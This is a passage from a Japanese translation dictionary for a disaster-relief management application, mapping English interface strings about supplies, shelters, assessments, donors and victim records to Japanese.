'Color of dropdown menus': 'ドロップダウンメニューの色',
'Color of selected Input fields': '選択中の入力フィールドの色',
'Color of selected menu items': '選択中のメニューアイテムの色',
'Column Choices (One Per Line': 'カラム選択 (一行に一つ',
'Columns, pilasters, corbels': '円柱、付け柱、コーベル',
'Combined Method': '複数証跡の組み合わせ',
'Come back later. Everyone visiting this site is probably experiencing the same problem as you.': '復旧まで少々お待ちください。あなた以外の閲覧者にも、この表示がされています。',
'Come back later.': '復旧まで少々お待ちください',
'Comments': 'コメント',
'Commercial/Offices': '商業 / オフィス',
'Commit Date': '受け入れ日',
'Commit from %s': '%sからのコミット',
'Commit': 'コミット',
'Commit Status': '支援の引き受け状況',
'Commiting a changed spreadsheet to the database': '変更後のスプレッドシートをデータベースに反映します',
'Commitment Added': 'コミットメントを追加しました',
'Commitment Canceled': 'コミットをキャンセルしました',
'Commitment Details': 'コミットの詳細',
'Commitment Item Details': 'コミットされた救援物資の詳細',
'Commitment Item added': 'コミットの物資を追加しました',
'Commitment Item deleted': 'コミットされた救援物資を削除しました',
'Commitment Item updated': 'コミット物資を更新しました',
'Commitment Item': '物資のコミットメント',
'Commitment Items': 'コミットされた物資',
'Commitment Status': '支援の引き受け状況',
'Commitment Updated': 'コミットを更新しました',
'Commitment': 'コミットメント',
'Commitments': 'コミット',
'Committed By': '受け入れ団体/人',
'Committed': 'コミット済み',
'Committing Inventory': '引き受け中の倉庫',
'Communication problems': 'コミュニケーションの問題',
'Community Centre': 'コミュニティセンター',
'Community Health Center': '地域の医療センター',
'Community Member': 'コミュニティの構成員',
'Complete Unit Label for e.g. meter for m.': '単位を表すラベル。例えばメートルなら m など。',
'Complete': '完了',
'Completed': '完了',
'Complexion': '人種、肌色',
'Compose': 'メッセージ作成',
'Compromised': '易感染状態',
'Concrete frame': 'コンクリートのフレーム',
'Concrete shear wall': 'コンクリートせん断壁',
'Config added': '設定を追加しました',
'Config deleted': '設定を削除しました',
'Config updated': '設定を更新しました',
'Config': '設定',
'Configs': '設定',
'Configurations': '設定',
'Configure Run-time Settings': 'ランタイムの設定',
'Confirm Shipment Received': '配送物の受領を確認',
'Confirmed Incidents': '確認済みのインシデント',
'Confirmed': '確認済み',
'Conflict Details': 'コンフリクトの詳細',
'Conflict Resolution': 'データ競合の解決',
'Consignment Note': '貨物運送状',
'Constraints Only': '制約のみ',
'Consumable': '消耗品',
'Contact Data': '連絡先データ',
'Contact Details': '連絡先の詳細',
'Contact Information Added': '連絡先情報を追加しました',
'Contact Information Deleted': '連絡先情報を削除しました',
'Contact Information Updated': '連絡先情報を更新しました',
'Contact Information': '連絡先情報',
'Contact Method': '問い合わせ方法',
'Contact Name': '連絡先名',
'Contact Person': '窓口担当者',
'Contact Phone': '連絡先電話番号',
'Contact details': '連絡先の詳細',
'Contact information added': '連絡先情報を追加しました',
'Contact information deleted': '連絡先情報を削除しました',
'Contact information updated': '連絡先情報を更新しました',
'Contact person in case of news or further questions (if different from reporting person). Include telephone number, address and email as available.': '詳細事項の質問や連絡を行なう際の連絡担当者を記載します(レポート報告者と異なる場合のみ)。電話番号、住所、電子メールなどを記載してください。',
'Contact person(s) in case of news or further questions (if different from reporting person). Include telephone number, address and email as available.': '情報伝達や追加質問を行う際の代表担当者(報告者と異なる場合のみ記載してください)。電話番号や住所、メールアドレスなどを指定できます。',
'Contact us': '問い合わせ',
'Contact': '連絡先',
'Contacts': '連絡先',
'Contents': '内容',
'Contradictory values!': '値が矛盾しています!',
'Contributor': '投稿者',
'Conversion Tool': '変換ツール',
'Cooking NFIs': '調理用器具',
'Cooking Oil': '調理油',
'Coordinate Conversion': '座標変換',
'Coping Activities': '一時対応活動',
'Copy any data from the one to be deleted into the one to keep': '削除する側の候補地から残す方の候補地へ、必要なデータを転載します。',
'Copy': 'コピー',
'Corn': 'とうもろこし',
'Cost Type': '料金種別',
'Cost per Megabyte': '1メガバイト毎に課金',
'Cost per Minute': '1分毎に課金',
'Country of Residence': '居住国',
'Country': '国',
'Create & manage Distribution groups to receive Alerts': 'アラートの送付先グループを作成・管理する',
'Create Activity Report': '支援活動レポートを追加',
'Create Activity Type': '支援活動タイプを追加',
'Create Activity': '支援活動を追加',
'Create Assessment': 'アセスメントを新規追加',
'Create Asset': '資産の追加',
'Create Bed Type': 'ベッドの種類を追加',
'Create Brand': '銘柄を追加',
'Create Budget': '予算を追加',
'Create Catalog Item': '物資カタログを追加',
'Create Catalog': 'カタログを追加',
'Create Checklist': 'チェックリストの作成',
'Create Cholera Treatment Capability Information': 'コレラ治療能力に関する情報の追加',
'Create Cluster Subsector': 'クラスタのサブセクタを追加',
'Create Cluster': 'クラスタを追加',
'Create Contact': '連絡先を追加',
'Create Dead Body Report': '遺体発見レポートを追加',
'Create Feature Layer': 'Feature Layerを追加',
'Create Group Entry': 'グループエントリの作成',
'Create Group': 'グループを追加',
'Create Hospital': '病院を新規追加',
'Create Identification Report': 'IDレポートを追加',
'Create Impact Assessment': '災害影響範囲アセスメントの作成',
'Create Import Job': 'Import Jobの作成',
'Create Incident Report': 'インシデントレポートを追加',
'Create Incident': 'インシデントを追加',
'Create Item Category': '物資カテゴリを追加',
'Create Item Pack': '救援物資パックの追加',
'Create Item': '救援物資を新規追加',
'Create Kit': 'キットを新規追加',
'Create Layer': 'レイヤを追加',
'Create Location': 'ロケーションを追加',
'Create Map Profile': '地図設定を追加',
'Create Marker': 'マーカーを追加',
'Create Member': 'メンバを追加',
'Create Mobile Impact Assessment': '災害影響範囲アセスメントをモバイル端末から作成',
'Create Office': 'オフィスを追加',
'Create Organization': '団体を追加',
'Create Personal Effects': 'Personal Effectsを追加',
'Create Project': 'プロジェクトを追加',
'Create Projection': '地図投影法を追加',
'Create Rapid Assessment': '被災地の現況アセスメントを作成',
'Create Report': 'レポートを新規追加',
'Create Request': '支援要請を作成',
'Create Resource': 'リソースを追加',
'Create River': '河川情報を追加',
'Create Role': '役割を追加',
'Create Sector': '活動分野を追加',
'Create Service Profile': 'サービスプロファイルを追加',
'Create Shelter Service': '避難所における提供サービスを追加',
'Create Shelter Type': '避難所タイプを追加',
'Create Shelter': '避難所を追加',
'Create Skill Type': 'スキルタイプを追加',
'Create Skill': 'スキルを追加',
'Create Status': '状況を追加',
'Create Task': 'タスクを追加',
'Create Theme': 'テーマを追加',
'Create User': 'ユーザを追加',
'Create Volunteer': 'ボランティアの追加',
'Create Warehouse': '倉庫を追加',
'Create a Person': '人物情報を追加',
'Create a group entry in the registry.': '登録にグループエントリを作成。',
'Create, enter, and manage surveys.': '調査の作成、入力、管理を実施',
'Creation of Surveys': '聞き取り調査の新規作成',
'Credential Details': '証明書の詳細',
'Credential added': '証明書を追加しました',
'Credential deleted': '証明書を削除しました',
'Credential updated': '証明書を更新しました',
'Credentials': '証明書',
'Crime': '犯罪',
'Criteria': '基準',
'Currency': '通貨',
'Current Group Members': '現在のグループメンバ',
'Current Identities': '現在のID',
'Current Location': '現在のロケーション',
'Current Log Entries': '現在のログエントリ',
'Current Memberships': '現在のメンバシップ',
'Current Notes': '現在選択中の追加情報',
'Current Registrations': '現在の登録',
'Current Status': '現在の状況',
'Current Team Members': '現在のチームメンバ',
'Current Twitter account': '現在のTwitterアカウント',
'Current community priorities': '現在のコミュニティの優先順位',
'Current general needs': '現在の需要',
'Current greatest needs of vulnerable groups': '現在、被災者が最も必要としている物資/サービス',
'Current health problems': '現在の健康問題',
'Current main income sources': '現在の主な収入源',
'Current major expenses': '現在の主な支出項目',
'Current number of patients': '現在の患者数',
'Current problems, categories': '現在の問題、カテゴリ',
'Current problems, details': '現在の問題の詳細',
'Current request': '現在の要求',
'Current response': '現在の対応状況',
'Current session': '現在のセッション',
'Current type of health problems, adults': '現在発生中の健康問題(成人)',
'Current type of health problems, children': '現在発生中の健康問題(小児)',
'Current type of source for drinking water': '現在の飲料水確保方法',
'Current type of source for sanitary water': '現在の生活用水確保方法',
'Custom Database Resource (e.g., anything defined as a resource in Sahana)': 'カストマイズされたデータベースのリソース (例:Sahana 内のリソースとして定義された物)',
'Customisable category of aid': 'カスタマイズ可能な支援カテゴリ',
'DC': '寄付の証明(Donation Certificate)',
'DECISION': '決定',
'DNA Profile': 'DNAプロファイル',
'DNA Profiling': 'DNAプロファイリング',
'DVI Navigator': '被災者の検索',
'Daily': '日次',
'Dam Overflow': 'ダム決壊',
'Damage': '損傷',
'Dangerous Person': '危険人物',
'Dashboard': 'ダッシュボード',
'Data import policy': 'データのインポートポリシー',
'Data uploaded': 'データがアップロードされました',
'Database': 'データベース',
'Date & Time': '日付と時刻',
'Date Avaialble': '日付あり',
'Date Available': '可能な日付',
'Date Received': '物資受領日',
'Date Requested': '要請した日',
'Date Required': '物資が必要になる日',
'Date Sent': '送付日',
'Date and Time of Goods receipt. By default shows the current time but can be modified by editing in the drop down list.': '物資を受領した日時を記録します。デフォルトでは現在の時間が入力されます。変更するには、ドロップダウンリストから選択してください。',
'Date and Time': '日付と時刻',
'Date and time this report relates to.': 'このレポートに関連する日付と時刻',
'Date of Birth': '生年月日',
'Date of Latest Information on Beneficiaries Reached': '支援が届いた受益者に関する最新情報の日付',
'Date of Report': 'レポートの日付',
'Date': '日付',
'Date/Time of Find': '日付/発見日時',
'Date/Time of disappearance': '行方不明になった日付/時刻',
'Date/Time': '日付/時刻',
'De-duplicator': '重複解消機能',
'Dead Body Details': '遺体の詳細',
'Dead Body Reports': '遺体情報レポート',
'Dead Body': '遺体の管理',
'Dead body report added': '遺体発見レポートを追加しました',
'Dead body report deleted': '遺体報告を削除しました',
'Dead body report updated': '遺体レポートを更新しました',
'Deaths in the past 24h': '過去24時間の死者',
'Deaths/24hrs': '死亡者数/24h',
'Debug': 'デバッグ',
'Deceased': '死亡',
'Decimal Degrees': '十進角',
'Decomposed': '腐乱',
'Default Height of the map window. In Window layout the map maximises to fill the window, so no need to set a large value here.': 'マップウィンドウのデフォルトの縦高。ウィンドウレイアウトでは、マップはウィンドウ全体に最大化されるので、大きな値を設定する必要はありません。',
'Default Height of the map window.': '地図ウィンドウの初期の高さ',
'Default Marker': 'デフォルトマーカー',
'Default Width of the map window. In Window layout the map maximises to fill the window, so no need to set a large value here.': 'マップウィンドウのデフォルトの幅。ウィンドウレイアウトでは、マップはウィンドウ全体に最大化されるので、大きな値を設定する必要はありません。',
'Default Width of the map window.': '地図ウィンドウの幅の初期値',
'Default synchronization policy': 'データ同期ポリシーのデフォルト設定',
'Defaults updated': 'デフォルト値を更新しました',
'Defaults': 'デフォルト値',
'Defecation area for animals': '動物排便用の地域',
'Defines the icon used for display of features on handheld GPS.': 'ハンドヘルドGPSに表示するアイコンを決定します。',
'Defines the icon used for display of features on interactive map & KML exports. A Marker assigned to an individual Location is set if there is a need to override the Marker assigned to the Feature Class. If neither are defined, then the Default Marker is used.': '対話型地図および KML の出力上で Feature の表示に使用するアイコンを定義します。Feature Class に割り当てられたマーカーを上書きする必要がある場合、個々の場所に割り当てられたマーカーが設定されます。どちらも定義されていない場合は、デフォルトのマーカーが使用されます。',
'Defines the icon used for display of features on interactive map & KML exports.': 'インタラクティブマップとKMLエクスポートで建物などの表示に使われるアイコン定義',
'Defines the marker used for display & the attributes visible in the popup.': 'ポップアップ時と通常時に表示されるマーカーを指定してください。',
'Degrees must be a number between -180 and 180': '度数は -180 から 180 の間にしてください。',
'Dehydration': '脱水症状',
'Delete Aid Request': '援助要請を削除',
'Delete Alternative Item': '代わりの物資を削除する',
'Delete Assessment Summary': 'アセスメントの要約を削除',
'Delete Assessment': 'アセスメントを削除',
'Delete Asset Assignments': '資産割り当ての削除',
'Delete Asset': '資産の削除',
'Delete Baseline Type': '基準値タイプを削除',
'Delete Baseline': '基準値を削除',
'Delete Brand': '銘柄を削除',
'Delete Budget': '予算を削除',
'Delete Bundle': 'Bundleを削除',
'Delete Catalog Item': '救援物資カタログを削除',
'Delete Cluster Subsector': 'クラスタのサブクラスタを削除',
'Delete Cluster': 'クラスタを削除',
'Delete Commitment Item': 'コミットした物資の削除',
'Delete Commitment': 'コミットメントの削除',
'Delete Config': '設定を削除',
'Delete Contact Information': '連絡先情報の削除',
'Delete Credential': '証明書の削除',
'Delete Distribution Item': '配給物資を削除',
'Delete Distribution': '配給所を削除',
'Delete Document': '文書を削除',
'Delete Donor': '資金提供組織を削除',
'Delete Entry': 'エントリを削除',
'Delete Feature Layer': '機能レイヤを削除',
'Delete Group': 'グループを削除',
'Delete Hospital': '病院を削除',
'Delete Image': '画像を削除',
'Delete Impact Type': '影響範囲のタイプを削除',
'Delete Impact': '影響範囲の削除',
'Delete Incident Report': 'インシデントレポートを削除',
'Delete Incident': 'インシデントを削除',
'Delete Inventory Item': '備蓄物資を削除',
'Delete Inventory Store': '物資集積地点を削除',
'Delete Item Category': 'アイテムカテゴリを削除',
'Delete Item Pack': '救援物資パックの削除',
'Delete Item': '救援物資を削除',
'Delete Key': 'Keyを削除',
'Delete Kit': 'Kitを削除',
'Delete Layer': 'レイヤーを削除',
'Delete Level 1 Assessment': 'レベル1アセスメントの削除',
'Delete Level 2 Assessment': 'レベル2アセスメントの削除',
'Delete Location': 'ロケーションを削除',
'Delete Map Profile': '地図設定を削除',
'Delete Marker': 'マーカーを削除',
'Delete Membership': 'メンバシップを削除',
'Delete Message': 'メッセージを削除',
'Delete Metadata': 'メタデータを削除',
'Delete Need Type': '需要タイプを削除',
'Delete Need': '要求を削除',
'Delete Office': 'オフィスを削除',
'Delete Old': '古いものを削除',
'Delete Organization': '団体情報を削除',
'Delete Peer': 'データ同期先の削除',
'Delete Person': '人物情報を削除',
'Delete Photo': '写真を削除',
'Delete Project': 'プロジェクトを削除',
'Delete Projection': '地図投影法を削除',
'Delete Rapid Assessment': '被災地の現況アセスメントを削除',
'Delete Received Item': '受け取った物資の削除',
'Delete Received Shipment': '受け取った輸送の削除',
'Delete Record': 'レコードを削除',
'Delete Recovery Report': '遺体回収レポートを削除',
'Delete Report': 'レポートを削除',
'Delete Request Item': '物資の要請を削除',
'Delete Request': '支援要請を削除',
'Delete Resource': 'リソースを削除',
'Delete Section': 'Sectionを削除',
'Delete Sector': '活動分野を削除',
'Delete Sent Item': '送付物資を削除',
'Delete Sent Shipment': '輸送物資を削除',
'Delete Service Profile': 'サービスプロファイルを削除',
'Delete Setting': '設定を削除',
'Delete Skill Type': 'スキルタイプを削除',
'Delete Skill': 'スキルを削除',
'Delete Staff Type': 'スタッフタイプを削除',
'Delete Status': '状況を削除しました',
'Delete Subscription': '寄付申し込みを削除',
'Delete Survey Answer': '調査回答削除',
'Delete Survey Question': 'Survey Questionを削除',
'Delete Survey Section': '調査項目を削除',
'Delete Survey Series': '一連の調査を削除',
'Delete Survey Template': '調査用テンプレートを削除',
'Delete Unit': '単位を削除',
'Delete User': 'ユーザを削除',
'Delete Volunteer': 'ボランティアを削除',
'Delete Warehouse Item': '倉庫物資の削除',
'Delete Warehouse': '倉庫を削除',
'Delete from Server?': 'サーバから削除しますか?',
'Delete': '削除',
'Delivered': '配信済み',
'Delphi Decision Maker': 'Delphi意思決定',
'Demographic': '人口情報',
'Demonstrations': 'デモ発生',
'Dental Examination': '歯科検査',
'Dental Profile': '歯の欠損/治療跡',
'Department/Unit Name': '所属部課名',
'Deployment': '展開',
'Describe the condition of the roads to your hospital.': '道路状況|病院までの道路状況を記載してください',
"Describe the procedure which this record relates to (e.g. 'medical examination')": 'このレコードに関連する手続きを説明してください。(例えば "検診" です。)',
'Description of Bin Type': 'Binタイプを記載してください',
'Description of Contacts': '連絡先の説明',
'Description of defecation area': '排泄用地についての補足説明',
'Description of drinking water source': '飲料水に関する補足説明',
'Description of sanitary water source': '生活用水に関する説明',
'Description of water source before the disaster': '災害発生前の水の確保方法について補足説明',
'Description': '説明',
'Descriptive Text (e.g., Prose, etc)': '説明文 (例: 文学、等)',
'Designated for': '指定済み',
'Desire to remain with family': '家族との残留を希望',
'Destination': '目的地',
'Detail': '詳細',
'Details': '詳細',
'Dialysis': '透析',
'Diaphragms, horizontal bracing': '仕切り板、水平部材',
'Diarrhea among children under 5': '5歳未満の幼児に下痢が蔓延している',
'Diarrhea': '下痢',
'Dignitary Visit': '要人の訪問',
'Dimensions of the storage bin. Input in the following format 1 x 2 x 3 for width x depth x height followed by choosing the unit from the drop down list.': '物資備蓄スペースの容積。ドロップダウンリストから単位を選び、以下の形式にしたがって入力してください。 1 x 2 x 3 , 横幅 x 奥行き x 縦幅。',
'Dimensions of the storage location. Input in the following format 1 x 2 x 3 for width x depth x height followed by choosing the unit from the drop down list.': '物資備蓄スペースの容積。ドロップダウンリストから単位を選び、以下の形式にしたがって入力してください。 1 x 2 x 3 , 横幅 x 奥行き x 縦幅。',
'Direction': '方向',
'Disable': '無効',
'Disabled participating in coping activities': '障害者が災害対応に従事',
'Disabled': '無効',
'Disabled?': '無効になっているか?',
'Disaster Victim Identification': '被災者の同定',
'Disaster Victim Registry': '被災者登録',
'Disaster clean-up/repairs': '災害の清掃活動や修復',
'Discharge (cusecs)': '流水量 (cusecs)',
'Discharges/24hrs': '退院者数/24h',
'Discussion Forum on item': 'フォーラム(物資について)',
'Discussion Forum': 'フォーラム',
'Disease vectors': '病原媒介者',
'Dispatch Items': 'アイテムの発送',
'Dispatch': '発送',
'Dispensary': '診療所',
'Displaced Populations': '避難者数',
'Displaced': '避難中',
'Display Polygons?': '多角形を表示しますか?',
'Display Routes?': 'ルートを表示しますか?',
'Display Tracks?': 'Tracksを表示しますか?',
'Display Waypoints?': 'ウェイポイントを表示しますか?',
'Dispose Expired/Unusable Items': '期限切れ / 使用できない物資の処分',
'Dispose': '処分',
'Distance between defecation area and water source': '水資源採取場所と排泄場所の間の距離',
'Distance between latrines and temporary shelter in meters': 'トイレと避難所の距離(m)',
'Distance between shelter and latrines': '簡易避難所と排泄場所との間の距離(メートル)',
'Distance(Kms)': '距離(Kms)',
'Distribution Details': '配給所の詳細',
'Distribution Item Details': '配給物資の詳細',
'Distribution Item added': '配給物資を追加しました',
'Distribution Item deleted': '配給物資を削除しました',
'Distribution Item updated': '配給物資を更新しました',
'Distribution Item': '配給物資',
'Distribution Items': '配給物資',
'Distribution added': '配給所を追加しました',
'Distribution deleted': '配給所を削除しました',
'Distribution groups': '配信グループ',
'Distribution updated': '配給所を更新しました',
'Distribution': '配給所',
'Distributions': '配給所',
'District': '地区(行政地区)',
'Do adolescent and youth in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)': 'あなたの地域の青年は、災害に対応するための支援活動に参加しますか?(例: 打ち合わせ、宗教活動、清掃活動ボランティアなど)',
'Do households each have at least 2 containers (10-20 litres each) to hold water?': '1つの世帯ごとに、少なくとも2つ以上の水貯蔵容器(10-20リットル/容器)があるかどうかを記載してください',
'Do households have appropriate equipment and materials to cook their food (stove, pots, dished plates, and a mug/drinking vessel, etc)?': '調理や食事に必要となる道具や器材(コンロ、ポット、皿やプレート、マグカップ、飲料容器など)が世帯に存在するかを記載します',
'Do households have bedding materials available (tarps, plastic mats, blankets)?': 'ベッド、あるいはベッド用部材(例:タープ、プラスチックマット、毛布)が世帯に存在するかを記載します',
'Do households have household water storage containers?': '水貯蔵容器が世帯に存在するかを記載します',
'Do minority members in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)': '地域にいるマイノリティ(社会的少数者)の人が、自助的な災害対処につながる活動に参加しているか記載してください。(例 打ち合わせ、宗教活動、地域の清掃ボランティアなど)',
'Do older people in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)': '災害復旧活動に従事している高齢者が、共同体の中にいるかどうかを記載してください(例: 打ち合わせ、宗教活動、清掃活動ボランティアなど)',
'Do people have at least 2 full sets of clothing (shirts, pants/sarong, underwear)?': '個人に対して、少なくとも2セット以上の衣服(シャツ、ズボン/腰巻、下着など)があるかどうか記載してください',
'Do people have reliable access to sufficient sanitation/hygiene items (bathing soap, laundry soap, shampoo, toothpaste and toothbrush)?': '十分な量のサニタリ / 衛生用品が、安定して供給されているかどうかを記載します(石鹸、シャンプー、歯ブラシ、洗濯用洗剤など)',
'Do people with disabilities in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)': 'あなたの地域の障害者は、災害に対処するための活動に参加していますか?(例: 打ち合わせ、宗教活動、清掃活動ボランティアなど)',
'Do women and girls have easy access to sanitary materials?': '女性用生理用品の入手が容易かどうかを記載してください',
'Do women in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)': 'あなたの地域の女性は、災害対応のための支援活動に参加しますか?(例: 打ち合わせ、宗教活動、清掃活動ボランティアなど)',
'Do you have access to cash to restart your business?': 'ビジネス再開に必要な現金が入手可能かどうかを記載してください',
'Do you know of any incidents of violence?': '暴力事件が発生したかどうかを記載してください',
'Do you know of children living on their own (without adults)?': '成人がおらず、未成年のみで生活しているグループがあるかどうかを記載してください',
'Do you know of children separated from their parents or caregivers?': '親や養育者とはぐれた未成年がいるかどうかを記載してください',
'Do you know of children that have been orphaned by the disaster?': '災害によって孤児となった未成年がいるかどうかを記載してください',
'Do you know of children that have been sent to safe places?': '安全な場所に疎開した未成年がいるかどうかを記載してください',
'Do you know of children that have disappeared without explanation in the period since the disaster?': '災害発生後、行き先の説明ないまま連絡が取れなくなった未成年がいるかどうかを記載してください',
'Do you know of older people who are primary caregivers of children?': '子どもの主たる養育者となっている高齢者がいるかどうかを記載してください',
'Do you know of parents/caregivers missing children?': '子供と連絡が取れなくなった親や養育者がいるかどうかを記載してください',
'Do you really want to delete these records?': '本当にこれらのデータを削除しますか?',
'Do you want to cancel this received shipment? The items will be removed from the Inventory. This action CANNOT be undone!': 'この輸送の受領をキャンセルしますか?キャンセルするとこの物資は備蓄から削除されます。この操作は *取り消せません!*',
'Do you want to cancel this sent shipment? The items will be returned to the Inventory. This action CANNOT be undone!': '出荷された物資をキャンセルしますか?この物資は、在庫に返されます。このアクションは、元に戻せません。',
'Do you want to over-write the file metadata with new default values?': 'ファイルのメタデータを、新しいデフォルト値で上書きしますか?',
'Do you want to receive this shipment?': 'この輸送物資を受け取られますか?',
'Do you want to send these Committed items?': 'これらコミットされた物資を送付してよいですか?',
'Do you want to send this shipment?': 'この発送情報を送信しますか?',
'Document Details': '文書の詳細',
'Document Scan': '文書のスキャン',
'Document added': '文書を追加しました',
'Document deleted': '文書を削除しました',
'Document updated': '文書を更新しました',
'Document': '文書',
'Documents and Photos': '文書と写真',
'Documents': '文書',
'Does this facility provide a cholera treatment center?': 'コレラ治療センターの機能を提供可能かどうか',
'Doing nothing (no structured activity)': '活動なし(組織立った行動なし)',
'Dollars': 'ドル',
'Domain': 'ドメイン',
'Domestic chores': '家事手伝い',
'Donation Certificate': '寄付証明書',
'Donation Phone #': '寄付受付電話番号',
'Donor Details': '資金提供組織の詳細',
'Donor added': '資金提供組織を追加しました',
'Donor deleted': '資金提供組織を削除しました',
'Donor updated': '資金提供組織を更新しました',
'Donor': '資金提供組織',
'Donors Report': '資金提供レポート',
'Donors': '資金提供組織',
'Door frame': 'ドア枠',
'Download PDF': 'PDFをダウンロード',
'Draft Features': '草案(ドラフト)',
'Draft': 'ドラフト',
'Drainage': '排水',
'Drawing up a Budget for Staff & Equipment across various Locations.': 'ロケーションに対する、スタッフと備品の予算を作成します。',
'Drill Down by Group': 'グループで絞り込み',
'Drill Down by Incident': 'インシデントで絞り込み',
'Drill Down by Shelter': '避難所で絞り込み',
'Driving License': '運転免許',
'Drought': '干ばつ',
'Drugs': '医薬品',
'Dug Well': '丸井戸',
'Duplicate?': '重複?',
'Duration': '活動実施期間',
'Dust Storm': '粉塵嵐',
'Dwelling': '居住施設',
'Dwellings': '住居数',
'EMS Reason': '緊急医療受け入れ状態',
'EMS Status Reason': '救急医療状況の理由',
'EMS Status': 'EMSステータス',
'EMS Traffic Status': '救急医療の混雑状況',
'ER Status Reason': 'ER医療状況の理由',
'ER Status': 'ER ステータス',
'Early Recovery': '早期復旧',
'Earthquake': '地震',
'Easy access to sanitation items for women/girls': '女性用サニタリ用品の入手が容易である',
'Edit Activity': '支援活動を編集',
'Edit Address': '住所の編集',
'Edit Aid Request': '援助要請を編集',
'Edit Alternative Item': '代わりの物資を編集',
'Edit Application': 'アプリケーションの編集',
'Edit Assessment Summary': 'アセスメントの要約を編集',
'Edit Assessment': 'アセスメントを編集',
'Edit Asset Assignment': '資産割り当ての編集',
'Edit Asset': '資産を編集',
'Edit Baseline Type': '基準値のタイプを編集',
'Edit Baseline': 'Baselineの編集',
'Edit Brand': '銘柄の編集',
'Edit Budget': '予算の編集',
'Edit Bundle': 'Bundleの編集',
'Edit Catalog Item': '救援物資カタログの編集',
'Edit Category<>Sub-Category<>Catalog Relation': 'Category<>Sub-Category<>Catalog 関係の編集',
'Edit Cluster Subsector': 'クラスタのサブセクターの編集',
'Edit Cluster': 'クラスタを編集',
'Edit Commitment Item': 'コミットされた物資の検索',
'Edit Commitment': 'コミットを編集',
'Edit Config': '設定の編集',
'Edit Contact Information': '連絡先情報の編集',
'Edit Contact': '連絡先の編集',
'Edit Contents': '内容の編集',
'Edit Credential': '証明書の編集',
'Edit Dead Body Details': '遺体の詳細を編集',
'Edit Defaults': 'デフォルト値の編集',
'Edit Description': '説明の編集',
'Edit Details': '詳細の編集',
'Edit Disaster Victims': '被災者情報の編集',
'Edit Distribution Item': '配給物資の編集',
'Edit Distribution': '配給所の編集',
'Edit Document': '文書を編集',
'Edit Donor': '資金提供組織の編集',
'Edit Email Settings': '電子メール設定の編集',
'Edit Feature Layer': 'Feature Layerの編集',
'Edit Flood Report': '洪水レポートの編集',
'Edit Gateway Settings': 'ゲートウェイ設定の編集',
'Edit Group': 'グループの編集',
'Edit Hospital': '病院の編集',
'Edit Identification Report': 'IDレポートの編集',
'Edit Identity': 'IDの編集',
'Edit Image Details': '画像の詳細の編集',
'Edit Image': '画像の編集',
'Edit Impact Type': '災害影響のタイプを編集',
'Edit Impact': '被災影響の編集',
'Edit Incident Report': 'インシデントレポートの編集',
'Edit Incident': 'インシデントを編集',
'Edit Inventory Item': '備蓄物資の編集',
'Edit Inventory Store': '物資集積地点の編集',
'Edit Item Catalog Categories': '救援物資カタログのカテゴリを編集',
'Edit Item Catalog': '救援物資カタログの編集',
'Edit Item Category': '救援物資カテゴリの編集',
'Edit Item Pack': '物資パックを編集',
'Edit Item Sub-Categories': '救援物資サブカテゴリの編集',
'Edit Item': '物資の編集',
'Edit Key': 'Keyの編集',
'Edit Kit': 'Kitの編集',
'Edit Layer': 'レイヤの編集',
'Edit Level 1 Assessment': 'レベル1アセスメントを編集する',
'Edit Level 2 Assessment': 'レベル2アセスメントを編集',
'Edit Location': 'ロケーションの編集',
'Edit Log Entry': 'ログエントリの編集',
'Edit Map Profile': '地図設定を編集する',
'Edit Map Services': '地図サービスの編集',
'Edit Marker': 'マーカーの編集',
'Edit Membership': 'メンバシップの編集',
'Edit Message': 'メッセージの編集',
'Edit Messaging Settings': 'メッセージ設定の編集',
'Edit Metadata': 'メタデータの編集',
'Edit Modem Settings': 'モデム設定の編集',
'Edit Need Type': '需要タイプの編集',
'Edit Need': 'ニーズを編集',
'Edit Note': '追加情報を編集',
'Edit Office': 'オフィスの編集',
'Edit Options': 'オプション編集',
'Edit Organization': '団体の編集',
'Edit Parameters': 'パラメータの編集',
'Edit Peer Details': 'データ同期先の詳細を編集',
'Edit Peer': 'データ同期先の編集',
'Edit Person Details': '人物情報の詳細を編集',
'Edit Personal Effects Details': 'Personal Effectsの詳細の編集',
'Edit Photo': '写真の編集',
'Edit Pledge': '寄付の編集',
'Edit Position': '場所の編集',
'Edit Problem': '問題の編集',
'Edit Project': 'プロジェクトの編集',
'Edit Projection': '地図投影法の編集',
'Edit Rapid Assessment': '被災地の現況アセスメントの編集',
'Edit Received Item': '物資の受領を編集',
'Edit Received Shipment': '物資の輸送の受領報告を編集',
'Edit Record': 'レコードの編集',
'Edit Recovery Details': '遺体回収の詳細を編集',
'Edit Registration Details': '登録状況の詳細を編集',
'Edit Registration': '登録の編集',
'Edit Report': 'レポートの編集',
'Edit Request Item': '物資の要請を編集',
'Edit Request': '支援要請の編集',
'Edit Resource': 'リソースの編集',
'Edit Response': '返信を編集',
'Edit River': '河川の編集',
'Edit Role': '役割の編集',
'Edit Sector': '活動分野を編集',
'Edit Sent Item': '送付した物資の編集',
'Edit Setting': '設定の編集',
'Edit Settings': '設定の編集',
'Edit Shelter Service': '避難所提供サービスの編集',
'Edit Shelter Type': '避難所タイプの編集',
'Edit Shelter': '避難所の編集',
'Edit Shipment Transit Log': '輸送履歴の編集',
'Edit Shipment to Send': '送付する輸送を編集',
'Edit Shipment/Way Bills': '輸送伝票/貨物運送状の編集',
'Edit Shipment<>Item Relation': '輸送<>物資の関係を編集',
'Edit Site': 'Siteを編集',
'Edit Skill Type': 'スキルタイプの編集',
'Edit Skill': 'スキルの編集',
'Edit Solution': '解決案の編集',
'Edit Staff Type': 'スタッフタイプの編集',
'Edit Staff': 'スタッフの編集',
'Edit Storage Bin Type(s)': 'Storage Binタイプを編集',
'Edit Storage Bins': 'Storage Binの編集',
'Edit Storage Location': '備蓄地点の編集',
'Edit Subscription': '寄付申し込みの編集',
'Edit Survey Answer': '調査回答の編集',
'Edit Survey Question': '調査の質問項目を編集',
'Edit Survey Section': 'フィードバック内容を編集します',
'Edit Survey Series': '一連の調査の編集',
'Edit Survey Template': '調査テンプレートを編集',
'Edit Task': 'タスクの編集',
'Edit Team': 'チームの編集',
'Edit Theme': 'テーマの編集',
'Edit Themes': 'テーマの編集',
'Edit Ticket': 'チケットの編集',
'Edit Track': '追跡情報の編集',
'Edit Tropo Settings': 'Tropo 設定の編集',
